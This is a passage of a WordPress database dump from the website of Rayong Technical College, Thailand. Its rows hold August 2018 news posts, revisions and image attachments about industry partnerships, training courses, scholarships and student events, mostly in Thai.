'%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%b2%e0%b8%8a%e0%b8%b5%e0%b8%a7%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2%e0%b8%a3%e0%b8%b0%e0%b8%9a%e0%b8%9a%e0%b8%97', '', '', '2018-08-21 08:38:46', '2018-08-21 01:38:46', '', 0, 'http://www.technicrayong.ac.th/?p=3826', 332, 'post', '', 0),
(3827, 3, '2018-08-21 08:38:29', '2018-08-21 01:38:29', '', '39467395_659567821086076_2746832332563415040_o', '', 'inherit', 'closed', 'closed', '', '39467395_659567821086076_2746832332563415040_o', '', '', '2018-08-21 08:38:29', '2018-08-21 01:38:29', '', 3826, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/39467395_659567821086076_2746832332563415040_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3828, 3, '2018-08-21 08:38:46', '2018-08-21 01:38:46', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D659572364418955%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'โครงการอาชีวศึกษาระบบทวิภาคี จัดทำสัญญารับทุนการฝึกอบรมเพื่อเตรียมทำงานของนักเรียนทวิภาคี ระดับประกาศนียบัตรวิชาชีพชั้นปีที่ 1 ประจำปีการศึกษา 2561 โดยความร่วมมือของ วิทยาลัยเทคนิคระยอง และบริษัท ซีพี ออลล์ จำกัด (มหาชน) พร้อมทั้งชี้แจงรายละเอียดโครงการฯ โดย คุณภัณฑิรา วงศ์มณีรัตน์ ผู้ช่วยผู้จัดการ และคุณศุภิกา ประภาศิริกุล เจ้าหน้าที่บริหารโครงการศึกษา ณ วิทยาลัยเทคนิคระยอง วันศุกร์ที่ 17 สิงหาคม 2561', '', 'inherit', 'closed', 'closed', '', '3826-revision-v1', '', '', '2018-08-21 08:38:46', '2018-08-21 01:38:46', '', 3826, 'http://www.technicrayong.ac.th/3826-revision-v1/', 0, 'revision', '', 0),
(3829, 3, '2018-08-21 08:53:05', '2018-08-21 01:53:05', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.660610230981835&type=3\"><img class=\"aligncenter wp-image-3830 size-full\" src=\"/wp-content/uploads/2018/08/21-8-2561-8-43-46.jpg\" alt=\"\" width=\"463\" height=\"632\" /></a>', 'วันเสาร์ที่ 18 สิงหาคม 2561 วิทยาลัยเทคนิคระยอง ร่วมกับ บริษัท โกลบอล เพาเวอร์ ซินเนอร์ยี่ จำกัด (มหาชน) ร่วมมือกันในการจัดฝึกอบรมเชิงปฏิบัติการหลักสูตรวิชาชีพ ช่างเดินสายไฟฟ้าภานในอาคาร เพื่อสำรวจและรองรับการปรับปรุงระบบไฟฟ้า ระหว่างวันที่18-19, 25-26 สิงหาคม, 1 กันยายน และทดสอบมาตราฐานฝีมือแรงงาน วันที่ 2 กันยายน 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%80%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-18-%e0%b8%aa%e0%b8%b4%e0%b8%87%e0%b8%ab%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%a7%e0%b8%b4%e0%b8%97', '', '', '2018-08-21 08:53:05', '2018-08-21 01:53:05', '', 0, 'http://www.technicrayong.ac.th/?p=3829', 331, 'post', '', 0),
(3830, 3, '2018-08-21 08:41:16', '2018-08-21 01:41:16', '', '21-8-2561 8-43-46', '', 'inherit', 'closed', 'closed', '', '21-8-2561-8-43-46', '', '', '2018-08-21 08:41:16', '2018-08-21 01:41:16', '', 3829, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/21-8-2561-8-43-46.jpg', 0, 'attachment', 'image/jpeg', 0),
(3831, 3, '2018-08-21 08:48:21', '2018-08-21 01:48:21', '', '39442273_660601984315993_1317723643182055424_o', '', 'inherit', 'closed', 'closed', '', '39442273_660601984315993_1317723643182055424_o', '', '', '2018-08-21 08:48:21', '2018-08-21 01:48:21', '', 3829, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/39442273_660601984315993_1317723643182055424_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3832, 3, '2018-08-21 08:53:05', '2018-08-21 01:53:05', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.660610230981835&type=3\"><img class=\"aligncenter wp-image-3830 size-full\" src=\"/wp-content/uploads/2018/08/21-8-2561-8-43-46.jpg\" alt=\"\" width=\"463\" height=\"632\" /></a>', 'วันเสาร์ที่ 18 สิงหาคม 2561 วิทยาลัยเทคนิคระยอง ร่วมกับ บริษัท โกลบอล เพาเวอร์ ซินเนอร์ยี่ จำกัด (มหาชน) ร่วมมือกันในการจัดฝึกอบรมเชิงปฏิบัติการหลักสูตรวิชาชีพ ช่างเดินสายไฟฟ้าภานในอาคาร เพื่อสำรวจและรองรับการปรับปรุงระบบไฟฟ้า ระหว่างวันที่18-19, 25-26 สิงหาคม, 1 กันยายน และทดสอบมาตราฐานฝีมือแรงงาน วันที่ 2 กันยายน 2561 ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3829-revision-v1', '', '', '2018-08-21 08:53:05', '2018-08-21 01:53:05', '', 3829, 'http://www.technicrayong.ac.th/3829-revision-v1/', 0, 'revision', '', 0),
(3835, 3, '2018-08-24 09:36:21', '2018-08-24 02:36:21', '<img class=\"aligncenter wp-image-2643 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-18-45.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-2644\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-05-300x80.jpg\" alt=\"\" width=\"381\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-3324 size-full\" src=\"/wp-content/uploads/2018/07/22-5-2561-15-19-23.jpg\" alt=\"\" width=\"680\" height=\"335\" />\r\n<h4><strong><a href=\"/wp-content/uploads/2018/06/แผนการจัดการเรียนรู้-วิชางานแม่บ้านโรงแรม.pdf\">แผนการจัดการเรียนรู้ วิชางานแม่บ้านโรงแรม</a></strong></h4>\r\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สื่อการเรียน-วิชางานแม่บ้านโรงแรม-รหัสวิชา-2701-2004.pdf\">สื่อการเรียน วิชางานแม่บ้านโรงแรม รหัสวิชา 2701 2004</a></strong></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ทักษะชาตื.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม ทักษะพื้นฐาน ระดับชาติ ครั้งที่ ๒๗</a> </span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม </a><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf\"> ทักษะพื้นฐาน ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๒๙ </a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม-ภาค.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม ระดับอาชีวศึกษาจังหวัดระยอง</a></span></h4>\r\n \r\n\r\nhttps://www.youtube.com/watch?v=zHBbaDHxzu4\r\n\r\nhttps://www.youtube.com/watch?v=c9S7zZwl-iI&feature=youtu.be\r\n\r\nhttps://www.youtube.com/watch?v=txsLpn3jcpo\r\n\r\nhttps://www.youtube.com/watch?v=lMJQro3JQ3g\r\n\r\nhttps://youtu.be/CHzurSQGlZA\r\n\r\nhttps://www.youtube.com/watch?v=QHMev_L-eOA&amp;feature=youtu.be\r\n\r\n \r\n\r\n \r\n\r\n ', 'การโรงแรม', '', 'inherit', 'closed', 'closed', '', '2642-autosave-v1', '', '', '2018-08-24 09:36:21', '2018-08-24 02:36:21', '', 2642, 'http://www.technicrayong.ac.th/2642-autosave-v1/', 0, 'revision', '', 0),
(3836, 3, '2018-08-24 09:35:57', '2018-08-24 02:35:57', '<img class=\"aligncenter wp-image-2643 size-full\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-18-45.jpg\" alt=\"\" width=\"192\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-2644\" src=\"/wp-content/uploads/2018/05/22-5-2561-15-19-05-300x80.jpg\" alt=\"\" width=\"381\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-3324 size-full\" src=\"/wp-content/uploads/2018/07/22-5-2561-15-19-23.jpg\" alt=\"\" width=\"680\" height=\"335\" />\r\n<h4><strong><a href=\"/wp-content/uploads/2018/06/แผนการจัดการเรียนรู้-วิชางานแม่บ้านโรงแรม.pdf\">แผนการจัดการเรียนรู้ วิชางานแม่บ้านโรงแรม</a></strong></h4>\r\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/06/สื่อการเรียน-วิชางานแม่บ้านโรงแรม-รหัสวิชา-2701-2004.pdf\">สื่อการเรียน วิชางานแม่บ้านโรงแรม รหัสวิชา 2701 2004</a></strong></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ทักษะชาตื.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม ทักษะพื้นฐาน ระดับชาติ ครั้งที่ ๒๗</a> </span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม </a><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม.pdf\"> ทักษะพื้นฐาน ระดับภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๒๙ </a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/06/ภาพประกอบการแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม-ภาค.pdf\">การแข่งขันทักษะวิชาชีพการบริการอาหารและเครื่องดื่ม ระดับอาชีวศึกษาจังหวัดระยอง</a></span></h4>\r\n \r\n\r\nhttps://www.youtube.com/watch?v=zHBbaDHxzu4\r\n\r\nhttps://www.youtube.com/watch?v=c9S7zZwl-iI&feature=youtu.be\r\n\r\nhttps://www.youtube.com/watch?v=txsLpn3jcpo\r\n\r\nhttps://www.youtube.com/watch?v=lMJQro3JQ3g\r\n\r\nhttps://youtu.be/CHzurSQGlZA\r\n\r\nhttps://www.youtube.com/watch?v=QHMev_L-eOA&amp;feature=youtu.be\r\n\r\n \r\n\r\n \r\n\r\n ', 'การโรงแรม', '', 'inherit', 'closed', 'closed', '', '2642-revision-v1', '', '', '2018-08-24 09:35:57', '2018-08-24 02:35:57', '', 2642, 'http://www.technicrayong.ac.th/2642-revision-v1/', 0, 'revision', '', 0),
(3837, 3, '2018-08-24 11:09:14', '2018-08-24 04:09:14', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D659572364418955%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Friday 17th August 2018, The Bilateral Vocational Education System project offered contracts to certified 1st bilateral students to train and prepare to work for the academic year of 2018. This in cooperation with Rayong Technical College and CP All Publish Company Limited. Also here to explain the details of the project was the assistant manager Khun Puntira Wongmaneerut and Education management project staff Khun Supika Prapasirikun.', '', 'publish', 'closed', 'open', '', 'on-friday-17th-august-2018-the-bilateral-vocational-education-system-project-offered-contracts-to-certified-1st-bilateral-students-to-train-and-prepare-to-work-for-the-academic-year-of-2018-this-in', '', '', '2018-08-24 11:21:47', '2018-08-24 04:21:47', '', 0, 'http://www.technicrayong.ac.th/?p=3837', 330, 'post', '', 0),
(3838, 3, '2018-08-24 11:09:14', '2018-08-24 04:09:14', '', 'On Friday 17th August 2018, The Bilateral Vocational Education System project offered contracts to certified 1st bilateral students to train and prepare to work for the academic year of 2018. This in cooperation with Rayong Technical College and CP All Publish Company Limited. Also here to explain the details of the project was the assistant manager Khun Puntira Wongmaneerut and Education management project staff Khun Supika Prapasirikun.', '', 'inherit', 'closed', 'closed', '', '3837-revision-v1', '', '', '2018-08-24 11:09:14', '2018-08-24 04:09:14', '', 3837, 'http://www.technicrayong.ac.th/3837-revision-v1/', 0, 'revision', '', 0),
(3839, 3, '2018-08-24 11:10:01', '2018-08-24 04:10:01', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D659572364418955%26id%3D100010985913485&width=500\" width=\"500\" height=\"783\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'On Friday 17th August 2018, The Bilateral Vocational Education System project offered contracts to certified 1st bilateral students to train and prepare to work for the academic year of 2018. This in cooperation with Rayong Technical College and CP All Publish Company Limited. Also here to explain the details of the project was the assistant manager Khun Puntira Wongmaneerut and Education management project staff Khun Supika Prapasirikun.', '', 'inherit', 'closed', 'closed', '', '3837-revision-v1', '', '', '2018-08-24 11:10:01', '2018-08-24 04:10:01', '', 3837, 'http://www.technicrayong.ac.th/3837-revision-v1/', 0, 'revision', '', 0),
(3841, 3, '2018-08-28 09:29:20', '2018-08-28 02:29:20', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F1935084059845122&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 21 สิงหาคม 2561 บริษัท อีสเทิร์น โพลีแพค จำกัด จัดพิธีมอบทุนการศึกษาสำหรับนักศึกษาวิทยาลัยเทคนิคในเขตภาคตะวันออก ประจำปีการศึกษา 2561 โดยมอบทุนการศึกษาให้กับนักศึกษาระดับ ปวส.1 วิทยาลัยเทคนิคระยอง จำนวน 5 ทุน ทุนละ 5,000 บาท รวมเป็นเงินทั้งสิ้น 25,000 บาท', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-21-%e0%b8%aa%e0%b8%b4%e0%b8%87%e0%b8%ab%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%9a%e0%b8%a3', '', '', '2018-08-28 09:29:20', '2018-08-28 02:29:20', '', 0, 'http://www.technicrayong.ac.th/?p=3841', 329, 'post', '', 0),
(3843, 3, '2018-08-28 09:29:08', '2018-08-28 02:29:08', '', '39894734_1935072023179659_5433646843672133632_o', '', 'inherit', 'closed', 'closed', '', '39894734_1935072023179659_5433646843672133632_o', '', '', '2018-08-28 09:29:08', '2018-08-28 02:29:08', '', 3841, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/39894734_1935072023179659_5433646843672133632_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3844, 3, '2018-08-28 09:29:20', '2018-08-28 02:29:20', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F1935084059845122&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอังคารที่ 21 สิงหาคม 2561 บริษัท อีสเทิร์น โพลีแพค จำกัด จัดพิธีมอบทุนการศึกษาสำหรับนักศึกษาวิทยาลัยเทคนิคในเขตภาคตะวันออก ประจำปีการศึกษา 2561 โดยมอบทุนการศึกษาให้กับนักศึกษาระดับ ปวส.1 วิทยาลัยเทคนิคระยอง จำนวน 5 ทุน ทุนละ 5,000 บาท รวมเป็นเงินทั้งสิ้น 25,000 บาท', '', 'inherit', 'closed', 'closed', '', '3841-revision-v1', '', '', '2018-08-28 09:29:20', '2018-08-28 02:29:20', '', 3841, 'http://www.technicrayong.ac.th/3841-revision-v1/', 0, 'revision', '', 0),
(3845, 3, '2018-08-28 09:37:04', '2018-08-28 02:37:04', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D664868340556024%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง จัดโครงการอบรมเชิงปฏิบัติการสถานศึกษาธรรมาภิบาล การสร้างการรับรู้ และการยอมรับ ซื่อสัตย์ มีวินัย จิตอาสา ภายใต้โครงการหมื่นมือ (จิตอาสา) ในวันเสาร์ที่ 18 สิงหาคม 2561 ที่ผ่านมา ณ ห้องประชุมชั้น 4 อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b8%88%e0%b8%b1%e0%b8%94', '', '', '2018-08-28 09:37:04', '2018-08-28 02:37:04', '', 0, 'http://www.technicrayong.ac.th/?p=3845', 328, 'post', '', 0),
(3846, 3, '2018-08-28 09:33:03', '2018-08-28 02:33:03', '', '39891332_664866327222892_1834997886425759744_o', '', 'inherit', 'closed', 'closed', '', '39891332_664866327222892_1834997886425759744_o', '', '', '2018-08-28 09:33:03', '2018-08-28 02:33:03', '', 3845, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/39891332_664866327222892_1834997886425759744_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3847, 3, '2018-08-28 09:37:04', '2018-08-28 02:37:04', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D664868340556024%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง จัดโครงการอบรมเชิงปฏิบัติการสถานศึกษาธรรมาภิบาล การสร้างการรับรู้ และการยอมรับ ซื่อสัตย์ มีวินัย จิตอาสา ภายใต้โครงการหมื่นมือ (จิตอาสา) ในวันเสาร์ที่ 18 สิงหาคม 2561 ที่ผ่านมา ณ ห้องประชุมชั้น 4 อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3845-revision-v1', '', '', '2018-08-28 09:37:04', '2018-08-28 02:37:04', '', 3845, 'http://www.technicrayong.ac.th/3845-revision-v1/', 0, 'revision', '', 0),
(3848, 3, '2018-08-28 09:46:26', '2018-08-28 02:46:26', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.664910343885157&type=3\"><img class=\"aligncenter wp-image-3849 size-full\" src=\"/wp-content/uploads/2018/08/28-8-2561-9-45-00.jpg\" alt=\"\" width=\"460\" height=\"626\" /></a>', 'วันพุธที่ 22 สิงหาคม 2561 วิทยาลัยเทคนิคระยอง ได้รับคัดเลือกประเภทสถานศึกษาคุณธรรมอาชีวศึกษาต้นแบบ ในโครงงานคุณธรรมระดับอาชีวศึกษาจังหวัด เพื่อคัดเลือกเป็นตัวแทนระดับอาชีวศึกษาจังหวัดไปนำเสนอโครงงานในระดับภาคต่อไป', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88-22-%e0%b8%aa%e0%b8%b4%e0%b8%87%e0%b8%ab%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2', '', '', '2018-08-28 09:46:26', '2018-08-28 02:46:26', '', 0, 'http://www.technicrayong.ac.th/?p=3848', 327, 'post', '', 0),
(3849, 3, '2018-08-28 09:43:45', '2018-08-28 02:43:45', '', '28-8-2561 9-45-00', '', 'inherit', 'closed', 'closed', '', '28-8-2561-9-45-00', '', '', '2018-08-28 09:43:45', '2018-08-28 02:43:45', '', 3848, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/28-8-2561-9-45-00.jpg', 0, 'attachment', 'image/jpeg', 0),
(3850, 3, '2018-08-28 09:46:07', '2018-08-28 02:46:07', '', '39777403_664889000553958_8017799211066064896_o', '', 'inherit', 'closed', 'closed', '', '39777403_664889000553958_8017799211066064896_o', '', '', '2018-08-28 09:46:07', '2018-08-28 02:46:07', '', 3848, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/39777403_664889000553958_8017799211066064896_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3851, 3, '2018-08-28 09:46:26', '2018-08-28 02:46:26', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.664910343885157&type=3\"><img class=\"aligncenter wp-image-3849 size-full\" src=\"/wp-content/uploads/2018/08/28-8-2561-9-45-00.jpg\" alt=\"\" width=\"460\" height=\"626\" /></a>', 'วันพุธที่ 22 สิงหาคม 2561 วิทยาลัยเทคนิคระยอง ได้รับคัดเลือกประเภทสถานศึกษาคุณธรรมอาชีวศึกษาต้นแบบ ในโครงงานคุณธรรมระดับอาชีวศึกษาจังหวัด เพื่อคัดเลือกเป็นตัวแทนระดับอาชีวศึกษาจังหวัดไปนำเสนอโครงงานในระดับภาคต่อไป', '', 'inherit', 'closed', 'closed', '', '3848-revision-v1', '', '', '2018-08-28 09:46:26', '2018-08-28 02:46:26', '', 3848, 'http://www.technicrayong.ac.th/3848-revision-v1/', 0, 'revision', '', 0),
(3852, 3, '2018-08-28 09:50:22', '2018-08-28 02:50:22', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D664968360546022%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ 22 สิงหาคม 2561 บริษัท ไทยออยล์ เอนเนอร์ยี เซอร์วิส จำกัด จัดกิจกรรม CAREER ROADSHOW \"กลั่นพลังความคิด กลั่นชีวิตที่มั่นคงกับไทยออยล์\" ซึ่งประกอบด้วย กิจกรรมแนะนำธุรกิจไทยออยล์ บรรยายเรื่อง \"สัมภาษณ์งานอย่างไรให้โดนใจ\" เปิดรับสมัครงาน และสอบข้อเขียน โดยมีนักศึกษาระดับ ปวส.2 สาขาวิชาเทคนิคการผลิต เทคนิคโลหะ เครื่องมือวัดและควบคุม ปิโตรเคมี เคมีอุตสาหกรรม เทคโนโลยียาง เข้าร่วมกิจกรรม ณ ห้องประชุมสัมมนาอาชีวศึกษา วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88-22-%e0%b8%aa%e0%b8%b4%e0%b8%87%e0%b8%ab%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%9a%e0%b8%a3%e0%b8%b4%e0%b8%a9%e0%b8%b1', '', '', '2018-08-28 09:50:22', '2018-08-28 02:50:22', '', 0, 'http://www.technicrayong.ac.th/?p=3852', 326, 'post', '', 0),
(3853, 3, '2018-08-28 09:50:02', '2018-08-28 02:50:02', '', '39835076_664957580547100_3218962165968928768_o', '', 'inherit', 'closed', 'closed', '', '39835076_664957580547100_3218962165968928768_o', '', '', '2018-08-28 09:50:02', '2018-08-28 02:50:02', '', 3852, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/39835076_664957580547100_3218962165968928768_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3854, 3, '2018-08-28 09:50:22', '2018-08-28 02:50:22', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D664968360546022%26id%3D100010985913485&width=500\" width=\"500\" height=\"764\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ 22 สิงหาคม 2561 บริษัท ไทยออยล์ เอนเนอร์ยี เซอร์วิส จำกัด จัดกิจกรรม CAREER ROADSHOW \"กลั่นพลังความคิด กลั่นชีวิตที่มั่นคงกับไทยออยล์\" ซึ่งประกอบด้วย กิจกรรมแนะนำธุรกิจไทยออยล์ บรรยายเรื่อง \"สัมภาษณ์งานอย่างไรให้โดนใจ\" เปิดรับสมัครงาน และสอบข้อเขียน โดยมีนักศึกษาระดับ ปวส.2 สาขาวิชาเทคนิคการผลิต เทคนิคโลหะ เครื่องมือวัดและควบคุม ปิโตรเคมี เคมีอุตสาหกรรม เทคโนโลยียาง เข้าร่วมกิจกรรม ณ ห้องประชุมสัมมนาอาชีวศึกษา วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3852-revision-v1', '', '', '2018-08-28 09:50:22', '2018-08-28 02:50:22', '', 3852, 'http://www.technicrayong.ac.th/3852-revision-v1/', 0, 'revision', '', 0),
(3855, 3, '2018-08-28 09:57:50', '2018-08-28 02:57:50', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F1940274872659374&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันศุกร์ที่ 24 สิงหาคม 2561 พลเอกสุรเชษฐ์ ชัยวงศ์ รัฐมนตรีช่วยว่าการกระทรวงศึกษาธิการ เป็นประธานในพิธีเปิดงานเปิดบ้านการศึกษาในเขตพัฒนาพิเศษภาคตะวันออก (EEC) และเยี่ยมชมนิทรรศการของสถานศึกษาต่างๆ ณ โรงเรียนเบญจมราชรังสฤษฎิ์ จังหวัดฉะเชิงเทรา', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b8%e0%b8%81%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-24-%e0%b8%aa%e0%b8%b4%e0%b8%87%e0%b8%ab%e0%b8%b2%e0%b8%84%e0%b8%a1-2561-%e0%b8%9e%e0%b8%a5%e0%b9%80', '', '', '2018-08-28 09:57:50', '2018-08-28 02:57:50', '', 0, 'http://www.technicrayong.ac.th/?p=3855', 325, 'post', '', 0),
(3856, 3, '2018-08-28 09:57:25', '2018-08-28 02:57:25', '', '40045427_1940238999329628_2722430003424788480_o', '', 'inherit', 'closed', 'closed', '', '40045427_1940238999329628_2722430003424788480_o', '', '', '2018-08-28 09:57:25', '2018-08-28 02:57:25', '', 3855, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/08/40045427_1940238999329628_2722430003424788480_o.jpg', 0, 'attachment', 'image/jpeg', 0),
